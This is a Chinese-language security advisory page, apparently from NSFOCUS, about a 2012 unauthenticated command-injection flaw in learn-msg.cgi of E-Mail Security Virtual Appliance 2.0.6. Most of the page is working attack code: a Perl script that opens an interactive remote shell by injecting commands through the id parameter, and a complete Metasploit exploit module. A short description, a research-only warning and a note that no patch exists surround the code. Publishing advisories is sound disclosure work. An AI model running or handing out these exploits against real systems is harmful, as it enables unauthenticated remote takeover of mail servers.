安全研究
安全漏洞
E-Mail Security Virtual Appliance多个远程代码执行漏洞
发布日期:2012-08-16
更新日期:2012-08-23
受影响系统:
esvacommunity E-Mail Security Virtual Appliance 2.0.6描述:
BUGTRAQ ID: 55050
E-Mail Security Virtual Appliance是预建的、部分配置的电子邮件扫描设备,可运行在VMware Workstation、Server、Player或ESX Server上。
E-Mail Security Virtual Appliance 2.0.6及其他版本在实现上存在多个远程代码执行漏洞,利用这些漏洞可允许攻击者在受影响应用中执行任意代码。
<*来源:iJoo
链接:http://www.exploit-db.com/exploits/20551/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#! /usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
print "\n==========================================\n";
print " ESVA - REMOTE EXECUTION SCRIPT \n";
print "==========================================\n";
print "Usage: perl esva.pl host (without http://)\n";
print "Ex. perl esva.pl www.korban.com\n";
exit;
}
$host=$ARGV[0];
print "Try to Execution Command!\n";
print "iDSc-shell# ";
chomp( $cmd = <STDIN>);
while($cmd !~ "exit")
{
$content = "";
$ua = LWP::UserAgent->new();
$ua->agent('');
$request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");
$response = $ua->request ($request);
$content = $response->content;
print $content."\n";
print "iDSc-shell# ";
chomp( $cmd = <STDIN>);
}
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in E-Mail Security
Virtual Appliance. This module abuses the learn-msg.cgi file to execute arbitrary
OS commands without authentication. This module has been successfully tested on the
ESVA_2057 appliance.
},
'License' => MSF_LICENSE,
'Author' =>
[
'iJoo', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'EDB', '20551' ]
],
'Payload' =>
{
'BadChars' => "",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python',
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['ESVA_2057', {}],
],
'Privileged' => false,
'DisclosureDate' => "Aug 16 2012",
'DefaultTarget' => 0))
end
def check
clue = Rex::Text::rand_text_alpha(rand(5) + 5)
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-bin/learn-msg.cgi",
'vars_get' => {
'id' => "|echo #{clue};"
}
})
# If the server doesn't return the default redirection, probably something is wrong
if res and res.code == 200 and res.body =~ /#{clue}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Sending Command injection")
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-bin/learn-msg.cgi",
'vars_get' => {
'id' => "|#{payload.raw};"
}
})
# If the server doesn't return the default redirection, probably something is wrong
if not res or res.code != 200 or res.body !~ /meta http-equiv="refresh" content="0;URL=\/learned.html"/
print_error("#{peer} - Probably command not executed, aborting!")
return
end
print_good("#{peer} - Command executed successfully")
print_status("#{peer} - Output: \n#{res.body.split("Learned tokens")[0]}")
end
end
建议:
厂商补丁:
esvacommunity
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.esvacommunity.com/
浏览次数:2750
严重程度:0(网友投票)
绿盟科技给您安全的保障